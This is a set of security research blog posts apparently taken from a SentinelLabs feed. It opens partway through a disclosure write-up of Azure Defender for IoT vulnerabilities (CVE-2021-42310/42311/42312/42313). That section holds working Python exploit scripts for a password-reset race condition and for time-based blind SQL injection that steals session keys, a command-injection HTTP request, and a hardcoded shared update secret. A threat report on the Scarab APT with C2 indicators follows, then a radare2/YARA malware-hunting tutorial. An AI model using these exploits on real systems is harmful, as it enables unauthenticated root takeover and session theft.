        String data = "{\"tenantId\":\"<redacted>\",\"subscriptionId\":\"-\",\"type\":\"PasswordReset\",\"applianceId\":\"<redacted>\",\"issuanceDate\":\"06/19/2021\"}";
        try {
            String signature = Base64.encodeBase64String(CryptographyUtils.rsaSign("C:\\key.pem", data.getBytes()));
            JSONObject jsonData = new JSONObject(data);
            JSONObject completeData = new JSONObject();
            completeData.put("properties", jsonData);
            completeData.put("signature", signature);
            System.out.println(completeData.toString());
            FileUtils.write("C:\\ResetPassword.json", completeData.toString());
        } catch (GeneralSecurityException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

As mentioned, the applianceId is obtained from the password recovery page. The tenantId is not verified and can therefore be anything.

The issuanceDate parameter is self-explanatory.

Once generated and signed, it can be added to a ZIP archive and be used by the following Python exploit script:

import requests
import threading
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
 
 
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 
HOST = "192.168.1.130"
BENIGN_RESET_PATH = "./benign.zip"
MALICIOUS_RESET_PATH = "./malicious.zip"
 
 
BENIGN_DATA = open(BENIGN_RESET_PATH, "rb+").read()
MALICIOUS_DATA = open(MALICIOUS_RESET_PATH, "rb+").read()
 
 
def upload_reset_file(data, timeout=0):
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
 
    cookies = {
        "csrftoken": "aaaa"
    }
    files = {"file": data}
    data = {"path": "reset_password"}
    while True:
        requests.post("https://{0}/api/configuration/zip-file".format(HOST), data=data, files=files, headers=headers, cookies=cookies, verify=False)
        if timeout:
            time.sleep(timeout)
 
def recover_password():
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
 
    cookies = {
        "csrftoken": "aaaa"
    }
    data = {"user": "cyberx"}
    while True:
        req = requests.post("https://{0}/api/authentication/recover".format(HOST), json=data, headers=headers, cookies=cookies, verify=False)
        if b"newPassword" in req.content:
            print(req.content)
            sys.exit(1)
 
 
def main():
 
    looper_benign = threading.Thread(target=upload_reset_file, args=(BENIGN_DATA, 0), daemon=True)
    looper_malicious = threading.Thread(target=upload_reset_file, args=(MALICIOUS_DATA, 1), daemon=True)
    looper_recover = threading.Thread(target=recover_password, args=(), daemon=True)
 
    looper_benign.start()
    looper_malicious.start()
    looper_recover.start()
 
 
    looper_recover.join()
   
 
if __name__ == '__main__':
    main()

The benign.zip file is the ZIP file obtained from the Azure portal, as described above and the malicious.zip file is the mentioned specially-crafted ZIP file as described above.

The exploit script above performs the TOCTOU attack to reset and receive the password of the cyberx user without any authentication. It does so by utilizing three threads:

  • looper_benign – responsible for uploading the benign ZIP file in an infinite loop
  • looper_malicious – the same as looper_benign but uploads the malicious ZIP, in this configuration with a 1 second timeout
  • looper_recover – sends the password recovery request to trigger the vulnerable code

Somewhat unfortunately, the documentation mentions that the ZIP file cannot be tampered with.

This vulnerability is addressed as part of CVE-2021-42310.

Unauthenticated Remote Code Execution As Root #1

At this point, we can obtain a password for the privileged user cyberx. This allows us to log in to the SSH server and execute code as root. Even without this, an attacker could use a stealthier approach to execute code.

After logging in with the obtained password, the attack surface is vastly increased. For example, we found a simple command injection vulnerability within the change password mechanism:

From components\xsense-web\cyberx_web\api\authentication.py:151:

   def _post(self):
        try:
            body = self.parse_body()
            password = body['password']
            username = body['username'].lower()  # Lower case the username mainly because it does not matter
            ip_address = self.get_client_ip_address()
 
            # 1. validate credentials:
            try:
                logging.info('validate credentials...')
                user = LoginApiHandler.validate_credentials_and_get_user(username, password, ip_address)
            except UserFriendlyException as e:
                raise e
            except Exception as e:
                logging.error('User authentication failure', exc_info=True)
                raise UserFriendlyException('User authentication failure', e.message)
 
            # 2. validate new password:
            new_password = body['new_password']
            err_message = UserPasswordApiHandler.validate_password(new_password)
            if err_message:
                raise UserFriendlyException("Password doesn't match security policy", err_message)
 
            # 3. change password:
            user.set_password(new_password)
            user.save()
            process.run('sudo /usr/local/bin/cyberx-users-password-reset -u {username} -p {password}'
                        .format(username=user.get_username().encode('utf-8'), password=new_password), hide_output=True)
            return {'msg': 'Password has been replaced.'}
        except UserFriendlyException as e:
            raise e
        except Exception as e:
            raise UserFriendlyException("Unable to set password.", e.message)

The function receives three JSON fields from the user: “username”, “password”, and “new_password”.

First, it validates the username and password, which we already have. Next, it checks only the complexity of the new password using a regex, but does not sanitize the input for command injection primitives.

After the validation, it executes the /usr/local/bin/cyberx-users-password-reset script as root with the username and new password controlled by the attacker. Since the function doesn’t properly sanitize the “new_password” input, we can inject any command we choose. The injected command is then executed as root via sudo, because the cyberx user is a sudoer. This lets us execute code as root.

This can be exploited with the following HTTP packet:

POST /api/external/authentication/set_password HTTP/1.1
Host: 192.168.1.130
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-CSRFTOKEN: aaaa
Referer: https://192.168.1.130/login
Origin: https://192.168.1.130
Cookie: cyberx-version=10.3.1.7-r-55a4f94; csrftoken=aaaa; sessionid=kcnjq7wby7c28rxnppcex20gkajej3km; RELOCATE_URL=
Content-Length: 100
Content-Type: multipart/form-data; boundary=47dd42bb4cf2abb6e9c4c81019d8fbb4
 
{"username" : "cyberx", "password" : "",
"new_password": "``"}

This vulnerability is addressed as part of CVE-2021-42312.


In the remainder of this post, we present two additional attack routes with new vulnerabilities, as well as a vulnerability in the traffic processing framework.

These vulnerabilities are basic SQL Injections (with a twist), yet they have a high impact on the security of the product and the organization’s network.

CVE-2021-42313

The DynamicTokenAuthenticationBaseHandler class inherits from BaseHandler and does not require authentication. This class contains two functions (get_version_from_db, uuid_is_connected) which are prone to SQL injection.

def get_version_from_db(self, uuid):
    version = None
    with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
        logger.info("fetching the sensor version from db")
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        if len(xsenses) > 0:
            version = xsenses[0]['version']
            logger.info("sensor version according to db is: {}".format(version))
        else:
            logger.info("sensor not in db")
    return version
    
def uuid_is_connected(self, uuid):
    with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        result = len(xsenses) > 0
    return result

As shown, the UUID parameter is not sanitized and is formatted directly into an SQL query. A couple of classes inherit from DynamicTokenAuthenticationBaseHandler, and the flow to the vulnerable functions is reached during the token validation process.

Therefore, we can trigger the SQL injection without authentication.

These vulnerabilities can be triggered from:

  1. api/sensors/v1/sync
  2. api/v1/upgrade/status
  3. api/v1/upgrade/upgrade-log

It is worth noting that the function execute_select_query internally calls the SQL execute API, which supports stacked queries. This turns the “simple” SELECT SQL injection into a much more powerful primitive (i.e., executing any additional query by appending ‘;’). In our testing, we managed to insert, update, and execute special SQL commands.
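
To illustrate what this buys an attacker, a stacked-query payload for the unsanitized UID parameter could look something like the following sketch. The appended UPDATE statement is hypothetical; the table and column names are taken from the query shown above.

# Hypothetical stacked-query payload for the vulnerable UID parameter.
# The leading quote closes the original string literal, the semicolon
# terminates the SELECT, and an attacker-chosen statement is appended
# before the rest of the query is commented out.
uid_payload = "x'; UPDATE xsenses SET version = 'pwned'; -- "
 
body = {
    "token": "aleg",    # arbitrary value, as in the PoC script below
    "uid": uid_payload
}
# POSTed to /api/sensors/v1/sync, both statements would reach the
# stacked-query-capable execute API described above.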

For the PoC of this vulnerability, we used the api/sensors/v1/sync API. We created the following script to extract a logged-in user’s session ID from the database, which eventually allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
HOST = "https://192.168.126.150"
 
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2,3 -- a".format(currChr, currBit)
 
            body = {
                "token": "aleg",
                "uid": sql
            }
 
            now = datetime.datetime.now()
            res = requests.post(HOST + "/api/sensors/v1/sync", json=body, verify=False)
            if (datetime.datetime.now() - now).seconds > 2:
                bitStr += "1"
                print(1)
            else:
                bitStr += "0"
                print(0)
 
        final = bitStr[::-1]
        print(final)
        print(int(final, 2))
        chrNum = int(final, 2)
 
        if not chrNum:
            return
            
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
 
            
 
def main():
    startAttack()
 
if __name__ == "__main__":
    main()

An example of this script’s output:

After extracting the session ID from the database, we can log in to the management web interface, at which point there are several methods to execute code as root. For example, we could change the password and log in to the SSH server (these users are sudoers), use the script scheduling mechanism, or use the command injection vulnerability we mentioned earlier in this post.

This attack is made easy due to the lack of session validation. There is no further layer of validation, such as verifying that the session id is used from the same IP address and User-Agent as the initiator of the session.
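
Reusing the stolen session is then trivial. A minimal sketch follows: the host matches the PoC script above, the target URL is illustrative, and the cookie name is the one seen in the request shown earlier.

import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
HOST = "https://192.168.126.150"                           # test appliance from the PoC above
stolen_session = "<session_key extracted by the script>"   # placeholder
 
# No IP address or User-Agent binding is enforced, so presenting the cookie
# from any machine is enough to impersonate the logged-in user.
cookies = {"sessionid": stolen_session, "csrftoken": "aaaa"}
res = requests.get(HOST + "/", cookies=cookies, verify=False)
print(res.status_code)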

CVE-2021-42311

The UpdateHandshakeHandlers::is_connected function is also prone to SQL injection.

The UpdateHandshakeHandlers class inherits from BaseHandler, is accessible to unauthenticated users, and can be reached via the API /api/v1/token/update-handshake.

However, this time there is a twist: the _post function performs token verification.

class UpdateHandshakeHandlers(BaseHandler):
    def __init__(self):
        super(UpdateHandshakeHandlers, self).__init__()
        self.update_secret = update_secret
 
    def is_connected(self, sensor_uid):
        with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
            logger.info("fetching the sensor version from db")
            xsenses = client.execute_select_query(
                "SELECT id, UID FROM xsenses WHERE UID = '{}'".format(sensor_uid))
 
            if len(xsenses) > 0:
                logger.info("sensor {} found on db".format(sensor_uid))
                return True
            else:
                logger.info("sensor {} not in db".format(sensor_uid))
                return False
 
    def _post(self):
        try:
            body = self.parse_body()
        except Exception as ex:
            return self.generic_handler(self.invalid_body)
 
        try:
            sensor_update_secret = body['update_secret']
            sensor_uid = body['xsenseUID']
 
            if sensor_update_secret != self.update_secret:
                raise Exception('invalid secret')
 
            if not self.is_connected(sensor_uid):
                raise Exception('only supported with connected sensors')
        except Exception as ex:
            logging.exception('failed to fetch new token')
            return self.generic_handler(self.invalid_token)
 
        logger.info("update handshake succeeded")
        token = {
            'token': tokens.get_token()
        }
        return token

This means the API requires a secret token, and without it we cannot exploit this SQL injection vulnerability. Fortunately, this API token is not much of a secret: the update.token value is hardcoded in the file index.properties and is shared across all Defender for IoT installations worldwide, which means that an attacker may exploit this vulnerability without any authentication.

We created the following script to extract a logged-in user’s session ID from the database, which allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
HOST = "https://10.100.102.253"
 
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2 -- a".format(currChr, currBit)
 
            body = {
                "update_secret": "93960370-2f5f-4be1-813e-b7a3768ad288",
                "xsenseUID": sql
            }
 
            now = datetime.datetime.now()
            res = requests.post(HOST + "/api/v1/token/update-handshake", json=body, verify=False)
            if (datetime.datetime.now() - now).seconds > 2:
                bitStr += "1"
                print(1)
            else:
                bitStr += "0"
                print(0)
 
        final = bitStr[::-1]
        print(final)
        print(int(final, 2))
        chrNum = int(final, 2)
 
        if not chrNum:
            return
            
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
 
            
 
def main():
    startAttack()
 
if __name__ == "__main__":
    main()

As with the first SQL injection vulnerability, after extracting the session id from the database, we can use any of the methods mentioned above to execute code as root.

CVE-2021-37222

The sensor machine uses RCDCAP (an open source project) to decapsulate Cisco ERSPAN and HP ERM encapsulated packets.

The ERSPANProcessor::processImpl and HPERMProcessor::processImpl methods are vulnerable to a wildcopy heap-based buffer overflow, which can potentially allow arbitrary code execution when processing specially crafted input.

This vulnerability was found by locally fuzzing RCDCAP with pcap files and occurs when the following line is executed. The copy’s bounds are derived from attacker-controlled packet fields, so a capture length smaller than the computed source offset can produce an invalid range for std::copy, resulting in a wild copy:

(hp-erm-processor.cc:94)
(erspan-processor.cc:90)

std::copy(&packet[offset + MACHeader802_1Q::getVLANTagOffset()],
        &packet[caplen], &packet[MACHeader802_1Q::getVLANTagOffset()+MACHeader802_1Q::getVLANTagSize()]);

This was reported to the code owner and MSRC; the code owner has already issued a fix.

MSRC, however, decided that this vulnerability does not meet the bar for an MSRC security update, and the development group might decide to fix it as needed.

Impact

  • Who is affected? Unpatched deployments of Azure Defender for IoT are affected. Since this product has many configurations, for example RTOS, which have not been tested, users of those systems may be affected as well.
  • What is the risk? A successful attack may lead to full network compromise, since Azure Defender for IoT is configured to have a TAP (Terminal Access Point) on the network traffic. Access to sensitive information on the network could open a number of sophisticated attack scenarios that could be difficult or impossible to detect.

Mitigation

We responsibly disclosed our findings to MSRC in June 2021, and Microsoft released a security advisory with patch details in December 2021.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched, and checking access logs for irregularities.

Conclusion

Cloud providers heavily invest in securing their platforms, but unknown zero-day vulnerabilities are inevitable and put customers at risk. It’s particularly concerning when it comes to IoT and OT devices that have little to no defenses and depend entirely on these vulnerable platforms for their security posture. Cloud users should take a defense-in-depth approach to cloud security to ensure breaches are detected and contained, whether the threat comes from the outside or from the platform itself.

As part of SentinelLabs’ commitment to advancing public security, we actively invest in research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies and widely share our findings in the interest of protecting all users.

Disclosure Timeline

  • June 21, 2021 – Initial report to MSRC.
  • June 24, 2021 – Initial response from MSRC.
  • June 30, 2021 – MSRC requests a PoC video and code.
  • July 1, 2021 – We shared the code and a PoC video with MSRC.
  • July 16, 2021 – MSRC confirmed the bug and started working on a fix.
  • December 14, 2021 – MSRC released an advisory.

✇SentinelLabs

Chinese Threat Actor Scarab Targeting Ukraine

By: Tom Hegel

Executive Summary

  • Ukraine CERT (CERT-UA) has released new details on UAC-0026, which SentinelLabs confirms is associated with the suspected Chinese threat actor known as Scarab.
  • The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.
  • Scarab has conducted a number of campaigns over the years, making use of a custom backdoor originally known as Scieron, which may be the predecessor to HeaderTip.
  • While technical specifics vary between campaigns, the actor generally makes use of phishing emails containing lure documents relevant to the target, ultimately leading to the deployment of HeaderTip.

UAC-0026

On March 22nd 2022, CERT-UA published alert #4244, where they shared a quick summary and indicators associated with a recent intrusion attempt from an actor they dubbed UAC-0026. In the alert, CERT-UA noted the delivery of a RAR file archive "Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar", which translates to “On the preservation of video recordings of criminal actions of the army of the Russian Federation.rar”. Additionally, they note the archive contains an executable file, which opens a lure document, and drops the DLL file "officecleaner.dat" and a batch file "officecleaner". CERT-UA has named the malicious DLL ‘HeaderTip’ and notes similar activity was recorded in September 2020.

The UAC-0026 activity is the first public example of a Chinese threat actor targeting Ukraine since the invasion began. While there has been a marked increase in publicly reported attacks against Ukraine over the last week or so, these and all prior attacks have otherwise originated from Russian-backed threat actors.

Rough timeline of recent Ukrainian conflict cyber activity

Connection of HeaderTip to Scarab APT

Scarab has a relatively long history of activity based on open source intelligence. The group was first identified in 2015, and the associated IOCs are archived on OTX. As noted in the previous research, Scarab has operated since at least 2012, targeting a small number of individuals across the world, including in Russia, the United States, and elsewhere. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

During our review of the infrastructure and HeaderTip malware samples shared by CERT-UA, we identified relations between UAC-0026 and Scarab APT.

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group. An initial link can be made through the design of the malware samples and their associated loaders from at least 2020. Further relationships can be identified through the reuse of actor-unique infrastructure between the malware families associated with the groups:

  • 508d106ea0a71f2fd360fda518e1e533e7e584ed (HeaderTip – 2021)
  • 121ea06f391d6b792b3e697191d69dc500436604 (Scieron 2018)
  • Dynamic.ddns[.]mobi (Reused C2 Server)

As noted in the 2015 reporting on Scarab, there are various indications that the threat actor is Chinese speaking. Based on known targets since 2020, including those against Ukraine in March 2022, in addition to specific language use, we assess with moderate confidence that Scarab is Chinese-speaking and operating for geopolitical intelligence collection purposes.

Lure Documents

Analysis of lure documents used for initial compromise can provide insight into those being targeted and particular characteristics of their creator. For instance, in a September 2020 campaign targeting individuals believed to be in the Philippines, Scarab made use of lure documents titled “OSCE-wide Counter-Terrorism Conference 2020”. For context, the OSCE is the Organization for Security and Co-operation in Europe.

September 2020 Scarab APT Lure Document Content

More recently, industry colleagues have noted a case in which Scarab was involved in a campaign targeting European diplomatic organizations during the US withdrawal from Afghanistan.

The lure document reported by CERT-UA mimics the National Police of Ukraine, themed around the need to preserve video materials of crimes conducted by the Russian military.

Ukraine Targeting Lure Document

Lure documents through the various campaigns contain metadata indicating the original creator is using the Windows operating system in a Chinese language setting. This includes the system’s username set as “用户” (user).

Malware and Infrastructure

Multiple methods have been used to attempt to load the malware onto the target system. In the case of the 2020 documents, the user must enable document macros. In the most recent version from CERT-UA, the executable loader controls the installation with the help of a batch file while also opening the lure document. The loader executable itself contains the PDF, the batch installer, and the HeaderTip malware as resource data.

The batch file follows a simple set of instructions to define the HeaderTip DLL, set persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and then execute HeaderTip. Exports called across the HeaderTip samples have been HttpsInit and OAService, as shown here.

officecleaner.bat File Contents

The HeaderTip samples are 32-bit DLL files, written in C++, and roughly 9.7 KB. The malware itself will make HTTP POST requests to the defined C2 server using the user agent: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko". General functionality of HeaderTip is rather limited to beaconing outbound for updates, potentially so it can act as a simple first stage malware waiting for a second stage with more capabilities.
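
For defenders, this beaconing pattern offers a simple network-hunting opportunity: outbound POST requests that combine that exact User-Agent string with one of the C2 domains listed in the IOC table below. The sketch below is illustrative only; the log file name and format are placeholders, and this User-Agent value is a stock IE11 string, so it is meaningful only in combination with the C2 infrastructure.

# Illustrative sketch: flag proxy-log lines that pair the HeaderTip
# User-Agent with one of the C2 domains from the IOC table below.
HEADERTIP_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
C2_DOMAINS = ("product2020.mrbasic.com", "ebook.port25.biz", "mert.my03.com", "dynamic.ddns.mobi")
 
def is_suspicious(line):
    return HEADERTIP_UA in line and any(domain in line for domain in C2_DOMAINS)
 
with open("proxy.log") as log:      # placeholder log source
    for line in log:
        if is_suspicious(line):
            print(line.rstrip())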

Scarab has repeatedly made use of dynamic DNS services, which means the C2 server IP addresses and other subdomains under the same dynamic DNS domains should not be considered related. In fact, some of the dynamic DNS services used by Scarab can easily link one to various unrelated APT groups, such as those covered in the infamous CloudHopper report or the 2015 Bookworm malware blogs. While those may be associated with Chinese APTs, this more likely indicates a standard operating toolkit and approach rather than shared technical resources.

Conclusion

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group and represents the first publicly-reported attack on Ukraine from a non-Russian APT. The HeaderTip malware and associated phishing campaign utilizing Macro-enabled documents appears to be a first-stage infection attempt. At this point in time, the threat actor’s further objectives and motivations remain unclear.

Indicators of Compromise

IOC Description
product2020.mrbasic[.]com March 2022 C2 Server
8cfad6d23b79f56fb7535a562a106f6d187f84cf March 2022 Ukraine file delivery archive “Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar”
e7ef3b033c34f2ac2772c15ad53aa28599f93a51 March 2022 Loader Executable “officecleaner.dat”
fdb8de6f8d5f8ca6e52ce924a72b5c50ce6e5d6a March 2022 Ukraine lure document “#2163_02_33-2022.pdf”
4c396041b3c8a8f5dd9db31d0f2051e23802dcd0 March 2022 Ukraine batch file “officecleaner.bat”
3552c184281abcc14e3b941841b698cfb0ec9f1d March 2022 Ukraine HeaderTip sample “httpshelper.dll”
ebook.port25[.]biz September 2020 C2 Server
fde012fbcc65f4ab84d5f7d4799942c3f8792cc3 September 2020 file delivery archive “Joining Instructions IMPC 1.20 .rar”
e30a24e7367c4a82d283c7c68cff5739319aace9 September 2020 lure document “Joining Instructions IMPC 1.20 .xls”
5cc8ce82fc21add608277384dfaa8139efe8bea5 September 2020 HeaderTip samples based on C2 use
mert.my03[.]com September 2020 C2 Server
90c4223887f10f8f9c4ac61f858548d154183d9a September 2020 file delivery archive “OSCE-wide Counter-Terrorism Conference 2020.zip”
82f8c69a48fa1fa23ff37a0b0dc23a06a7cb6758 September 2020 lure document “OSCE-wide Counter-Terrorism Conference 2020”
b330cf088ba8c75d297d4b65bdbdd8bee9a8385c September 2020 HeaderTip sample “officecleaner.dll”
83c4a02e2d627b40c6e58bf82197e113603c4f87 HeaderTip (Possible researcher)
508d106ea0a71f2fd360fda518e1e533e7e584ed HeaderTip
dynamic.ddns[.]mobi C2 Server, overlaps with Scieron (b5f2cc8e8580a44a6aefc08f9776516a)

✇SentinelLabs

The Art and Science of macOS Malware Hunting with radare2 | Leveraging Xrefs, YARA and Zignatures

By: Phil Stokes

Welcome back to our series on macOS reversing. Last time out, we took a look at challenges around string decryption, following on from our earlier posts about beating malware anti-analysis techniques and rapid triage of Mac malware with radare2. In this fourth post in the series, we tackle several related challenges that every malware hunter faces: you have a sample, you know it’s malicious, but

  • How do you determine if it’s a variant of other known malware?
  • If it is unknown, how do you hunt for other samples like it?
  • How do you write robust detection rules that survive malware authors’ refactoring and recompilation?

The answer to those challenges is part Art and part Science: a mixture of practice, intuition and occasionally luck(!) blended with a solid understanding of the tools at your disposal. In this post, we’ll get into the tools and techniques, offer you tips to guide your practice, and encourage you to gain experience (which, in turn, will help you make your own luck) through a series of related examples.

As always, you’re going to need a few things to follow along, with the second and third items in this list installed in the first.

  1. An isolated VM – see instructions here for how to get set up
  2. Some samples – see Samples Used below
  3. Latest version of r2 – see the github repo here.

What are Zignatures and Why Are They Useful?

By now you might have wondered more than once if this post just had a really obvious typo: Zignatures, not signatures? No, you read that right the first time! Zignatures are r2’s own format for creating and matching function signatures. We can use them to see if a sample contains a function or functions that are similar to other functions we found in other malware. Similarly, Zignatures can help analysts identify commonly re-used library code, encryption algorithms and deobfuscation routines, saving us lots of reversing time down the road (for readers familiar with IDA Pro or Ghidra, think F.L.I.R.T or Function ID).

What’s particularly nice about Zignatures is that you can not only search for exact matches but also for matches with a certain similarity score. This allows us to find functions that have been modified from one instantiation to the other but which are otherwise the same.

Zignatures can help us to answer the question of whether an unknown sample is a variant of a known one. Once you are familiar with Zignatures, they can also help you write good detection rules, since they will allow you to see what is constant in a family of malware and what is variant. Combined with YARA rules, which we’ll take a look at later in this post, you can create effective hunting rules for malware repositories like VirusTotal to find variants or use them to help inform the detection logic in malware hunting software.

Create and Use A Zignature

Let’s jump into some malware and create our first Zignature. Here’s a recent sample of WizardUpdate (you might remember we looked at an older sample of WizardUpdate in our post on string decryption).

Loading the sample into r2, analyzing its functions, and displaying its hashes

We’ve loaded the sample into r2 and run some analysis on it. We’ve been conveniently dropped at the main() function, which looks like this.

WizardUpdate main() function

That main function contains some malware-specific strings, so it should make a nice target for a Zignature. To create one, we use the zaf command, supplying the parameters of the function name and the signature name. Our sample file happened to be called “WizardUpdate_B1”, so we’ll call this signature “WizardUpdateB1_main”. In r2, the full command we need, then, is:

> zaf main WizardUpdateB1_main

We can look at the newly-created Zignature in JSON format with zj~{} (if you’re not sure why we’re using the tilde, review the earlier post on grepping in r2).

An r2 Zignature viewed in JSON format

To see that the Zignature works, try zb and note the output:

zb returns how close the match was to the Zignature and the function at the current address

The first entry in the row is the most important, as that gives us the overall (i.e., average) match (between 0.00000 and 1.00000). The next two show us the match for bytes and graph, respectively. In this case, it’s a perfect match to the function, which is of course what we would expect as this is the sample from which we created the rule.

You can also create Zignatures for every function in the binary in one go with zg.

Create function signatures for every function in a binary with one command

Beware of using zg on large files with thousands of functions though, as you might get a lot of errors or junk output. For small-ish binaries with up to a couple of hundred functions it’s probably fine, but for anything larger than that I typically go for a targeted approach.

So far, we have created and tested a Zignature, but its real value lies in using it on other samples.

Create A Reusable and Extensible Zignatures File

At the moment, your Zignatures aren’t much use because we haven’t learned yet how to save and load Zignatures between samples. We’ll do that now.

We can save our generated Zignatures with zos <filename>. Note that if you just provide the bare filename it’ll save in the current working directory. If you give an absolute path to an existing file, r2 will nicely merge the Zignatures you’re saving with any existing ones in that file.

Radare2 does have a default location from which it is supposed to autoload Zignatures if the autoload variable is set, namely ~/.local/share/radare2/zigns/ (in some documentation, it’s ~/.config/radare2/zigns/). However, I’ve never quite been able to get autoload to work from either location, but if you want to try it, create the directory above and add the following line to your radare2 config file (~/.radare2rc):

e zign.autoload = true

In my case, I load my zigs file manually, which is a simple command: zo <filename> to load, and zb to run the Zignatures contained in the file against the function at the current address.

Sample WizardUpdate_B2’s main function doesn’t match our Zignature

Sample WizardUpdate_B5’s main function is a perfect match for our Zignature

As you can see, sample B5 above is a perfect match to B1, whereas B2 is way off, with a match of only around 46.6%.

When you’ve built up a collection of Zignatures, they can be really useful for checking a new sample against known families. I encourage you to create Zignatures for all your samples as they will pay dividends down the line. Don’t forget to back them up too. I learned the hard way that not having a master copy of my Zigs outside of my VMs can cause a few tears!
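
If you want to check a whole directory of new samples against your saved Zigs in one go, the same two commands can be driven from Python via r2pipe. This is a rough sketch: the Zignatures file name and sample paths are placeholders, and the flag name for main() may differ between binaries.

import glob
import r2pipe
 
ZIGS = "wizardupdate.sdb"                            # placeholder: file previously saved with zos
 
for path in glob.glob("samples/WizardUpdate_B*"):    # placeholder sample directory
    r2 = r2pipe.open(path)
    r2.cmd("aaa")                                    # analyse functions, as we did interactively
    r2.cmd("zo " + ZIGS)                             # load the saved Zignatures
    r2.cmd("s main")                                 # seek to main() (flag name may differ per binary)
    print(path, r2.cmd("zb").strip())                # best-match scores against our Zignatures
    r2.quit()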

Creating YARA Rules Within radare2

Zignatures will help you in your efforts to determine if some new malware belongs to a family you’ve come across before, but that’s only half the battle when we come across a new sample. We also want to hunt – and detect – files that are like it. For that, YARA is our friend, and r2 handily integrates the creation of YARA strings to make this easy.

In this next example, we can see that a different WizardUpdate sample doesn’t match our earlier Zignature.

The output from zb shows that the current function doesn’t match any of our previous function signatures

While we certainly want to add a function signature for this sample’s main() to our existing Zigs, we also want to hunt for this on external repos like VirusTotal and elsewhere where YARA can be used.

Our main friend here is the pcy command. Since we’ve already been dropped at main()’s address, we can just run the pcy command directly to create a YARA string for the function.

Generating a YARA string for the current function

However, this is far too specific to be useful. Fortunately, the pcy command can be tailored to give us however many bytes we wish at whatever address.

We know that WizardUpdate makes plenty of use of ioreg, so let’s start by searching for instances of that in the binary.

Searching for the string “ioreg” in a WizardUpdate sample

Lots of hits. Let’s take a closer look at the hex of the first one.

A URL embedded in the WizardUpdate sample

That URL address might be a good candidate to include in a YARA rule, so let’s try it. To grab it as YARA code, we just seek to the address and state how many bytes we want.

Generating a YARA string of 48 bytes from a specific address

This works nicely and we can just copy and paste the code into VT’s search with the content modifier. Our first effort, though, only gives us 1 hit on VirusTotal, although at least it’s different from our initial sample (we’ll add that to our collection, thanks!).

Our string only found a single hit on VirusTotal

But note how we can iterate on this process, easily generating YARA strings that we can use both for inclusion and exclusion in our YARA rules.


This time we had better success with 46 hits for one string

This string gives us lots of hits, so let’s create a file and add the string.

pcy 32 >> WizardUpdate_B.yara
Outputting the YARA string to a file

From here on in, we can continue to append further strings that we might want to include or exclude in our final YARA rule. When we are finished, all we have to do is open our new .yara file and add the YARA metadata and conditional logic, or we can paste the contents of our file into VT’s Livehunt template and test out our rule there.
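
Before submitting a Livehunt, you may also want to sanity-check the rule against local samples; the yara-python package makes that straightforward. A sketch, assuming the finished rule (strings plus metadata and condition) lives in WizardUpdate_B.yara and the samples sit in a local directory:

import glob
import yara
 
# Compile the finished rule file (the pcy-generated strings plus the
# metadata and condition section added by hand).
rules = yara.compile(filepath="WizardUpdate_B.yara")
 
for path in glob.glob("samples/*"):              # placeholder path to local samples
    matches = rules.match(filepath=path)
    if matches:
        print(path, [m.rule for m in matches])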

Xrefs For the Win

At the beginning of this post I said that the answer to some of the challenges we would deal with today was “part Art and part Science”. We’ve done plenty of “the Science”, so I want to round out the post by talking a little about “the Art”. Let’s return to a topic we covered briefly earlier in this series – finding cross-references in r2 – and introduce a couple of handy tips that can make development of hunting rules a little easier.

When developing a hunting or detection rule for a malware family, we are trying to balance two opposing demands: we want our rule to be specific enough not to create false positives, but wide or general enough not to miss true positives. If we had perfect knowledge of all samples that ever had been or ever would be created for the family under consideration, that would be no problem at all, but that’s precisely the knowledge-gap that our rule is aiming to fill.

A common tip for writing YARA rules is to use something like a combination of strings, method names and imports to try to achieve this balance. That’s good advice, but sometimes malware is packed to have virtually none of these, or not enough to make them easily distinguishable. On top of that, malware authors can and do easily refactor such artifacts and that can make your rules date very quickly.

